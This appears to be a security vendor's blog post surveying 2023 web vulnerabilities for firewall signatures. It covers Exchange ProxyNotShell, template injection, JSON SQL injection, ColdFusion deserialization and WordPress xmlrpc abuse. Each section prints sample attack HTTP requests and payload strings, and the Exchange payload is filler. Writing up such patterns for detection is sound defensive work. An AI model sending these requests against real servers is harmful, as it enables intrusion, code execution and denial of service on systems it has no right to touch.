Major Vulnerabilities in 2023 | Cloud SECaaS platform AIONCLOUD

AIONCLOUD BLOG

Share information related to AIONCLOUD !

Back to BLOG Main

Major Vulnerabilities in 2023

Major Vulnerabilities and Signature Pattern Response in 2023

  1. Overview :
    MONITORAPP's web firewall prevents and blocks attacks on web applications by integrating various security technologies. These technologies identify major vulnerabilities and provide effective responses to maintain the integrity and availability of web applications. To enhance the security of web applications, regularly updated signature patterns quickly detect and block various web attacks, serving as essential components. By using predefined signature patterns, quick responses are enabled, thus enhancing the stability of web applications.

While the security landscape continues to evolve and more sophisticated threats emerge, the transition to proactive security is inevitable. Traditional signature patterns remain vital security elements, offering high reliability and robust detection capabilities, playing a crucial role in current security strategies.

To address known and unknown threats in the security environment, it is important to harmonize intelligent and innovative technologies like artificial intelligence, big data, with traditional stability provided by signature patterns. These two security elements complement each other, contributing to overall security reinforcement.

 

In 2023, the threat analysis team investigated and analyzed particularly noteworthy vulnerabilities among various cyber threats occurring globally. This process yielded results for a swift and effective response. Below are the major vulnerabilities that garnered attention this year.

 

2. Major Vulnerabilities in 2023 :

2-1) MS Exchange Server Vulnerability where low-privileged users can access MS Exchange Server's PowerShell through various methods to upload and execute WebShells.

image.png

CVE-2022-41080: SSRF Vulnerability Attack Vulnerability occurs during the interpretation of the attacker's payload in the Front-End (HTTP Proxy) process.

image.png

CVE-2022-41082: RCE Vulnerability Attack Vulnerability occurs during the deserialization of the attacker's payload in the Back-End (Remote PowerShell) process.

Sample Attack Syntax and Detection

POST /autodiscover/admin@localhost/powershell/autodiscover.json?x=a HTTP/1.1
Authorization: Basic cG9jdXNlcjpwb2NwYXNzd29yZA==
Content-Length: 1821
Content-Type: application/soap+xml;charset=utf-8
Host: www.sample.com
User-Agent: HTTPie

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
	<s:Header>
		<a:To>https://exchange16.domaincorp.com:443/PowerShell?PSVersion=5.1.19041.610</a:To>
		<w:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI>
		<a:ReplyTo>
			<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
		</a:ReplyTo>
		<a:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>
		<w:MaxEnvelopeSize s:mustUnderstand="true">512000</w:MaxEnvelopeSize>
		<a:MessageID>uuid:{MessageID}</a:MessageID>
		<w:Locale xml:lang="en-US" s:mustUnderstand="false" />
		<p:DataLocale xml:lang="en-US" s:mustUnderstand="false" />
		<p:SessionId s:mustUnderstand="false">uuid:ddedca29-086e-4053-a983-0e00fa367968</p:SessionId>
		<p:OperationID s:mustUnderstand="false">uuid:4bbdc4fa-7040-4697-93f3-179f7108c8e8</p:OperationID>
		<p:SequenceId s:mustUnderstand="false">1</p:SequenceId>
		<w:OptionSet xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" s:mustUnderstand="true">
		
			<w:Option Name="protocolversion" MustComply="true">2.3</w:Option>
		</w:OptionSet>
		<w:OperationTimeout>PT180.000S</w:OperationTimeout>
	</s:Header>
	<s:Body>
		<rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" Name="WinRM10" >
			<rsp:InputStreams>stdin pr</rsp:InputStreams>
			<rsp:OutputStreams>stdout</rsp:OutputStreams>
			<creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAAAAASASDASDASASDSFASFASFDFADSKLJlkjlkjKLJSL...</creationXml>
		</rsp:Shell>
	</s:Body>
</s:Envelope>

 

2-2) Server Side Template Injection Vulnerability where malicious template syntax is inserted and executed in the web template engine applied to the web application.

image.png

Method to Confirm Template Engine: Attempt injection attacks using syntax appropriate for each engine.

image.png

Sample Attack Syntax and Detection

POST /test HTTP/1.1
Host: www.sample.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Query/Payload Length >= 10

Example
id=${{ "7"*7 }}&password=example

2-3) JSON Operator SQL Injection SQL injection vulnerability exploiting various DBMS's JSON data-related operators or functions added to them.

image.png

Support for JSON by DBMS

Since the functions and operators used vary for each DBMS, attacks should be attempted according to the specific features of each database management system.

image.png

Sample Attack Syntax and Detection

POST /test HTTP/1.1
Host: www.sample.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Query/Payload Length >= 10

Example
/test?temp=test' or json_array_length({}) <= 3

2-4) Adobe ColdFusion RCE vulnerability caused by unsafe deserialization vulnerability in Adobe ColdFusion product

image.png

Vulnerability Attack The attack involves planting a malicious Java class file in a known location and triggering the execution of that file by requesting the CFC endpoint.

image.png

Sample Attack Syntax and Detection

POST /testing.cfc?method=foo&_cfclient=true HTTP/1.1
Accept: */*
Connection: close
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
Host: 10.0.0.225:8080
User-Agent: HTTPie

_variables={"_metadata":{"classname":"\..\runtime\work\Catalina\localhost\tmp\hax.tmp"}, "_variables":{}"}

2-5) WordPress xmlrpc.php Vulnerabilities arising from pingback and brute-force attacks through WordPress's xmlrpc.php.

image.png

pingback: DoS attacks utilizing the pingback functionality after verifying the port.

image.png

brute-force: indiscriminate login attempts or password guessing attack.

image.png

Sample Attack Syntax and Detection

POST /xmlrpc.php HTTP/1.1
Content-Length: 258
Content-Type: application/xml; charset=utf-8
Host: xxx.com
User-Agent: HTTPie

<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://victim.com</string></value></param><param><value><string>http://xxx/sample-page/</string></value></param></params></methodCall>

3. Reference

Scroll Up